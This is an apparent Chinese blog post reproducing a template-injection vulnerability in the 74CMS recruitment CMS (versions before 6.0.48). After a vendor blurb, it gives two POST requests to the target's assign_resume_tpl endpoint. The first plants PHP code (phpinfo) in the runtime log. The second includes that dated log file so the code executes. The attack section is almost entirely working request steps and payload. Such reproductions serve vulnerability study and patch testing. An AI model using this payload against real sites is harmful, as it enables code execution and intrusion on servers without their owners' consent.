74CMS模版注入漏洞复现

骑士cms人才系统，是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度，骑士人才系统已成国内同类软件中的最好用的人才系统。

该漏洞影响版本： CMS < 6.0.48

漏洞复现

url：

http://目标IP地址/index.php?m=home&a=assign_resume_tpl

以post方式提交如下参数：

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

url:

http://目标IP地址/index.php?m=home&a=assign_resume_tpl

以post方式提交如下参数：

variable=1&tpl=data/Runtime/Logs/Home/22_04_15.log(注：该生成的日志文件为你的当前时间+.log)

如果觉得《74CMS模版注入漏洞复现》对你有帮助，请点赞、收藏，并留下你的观点哦！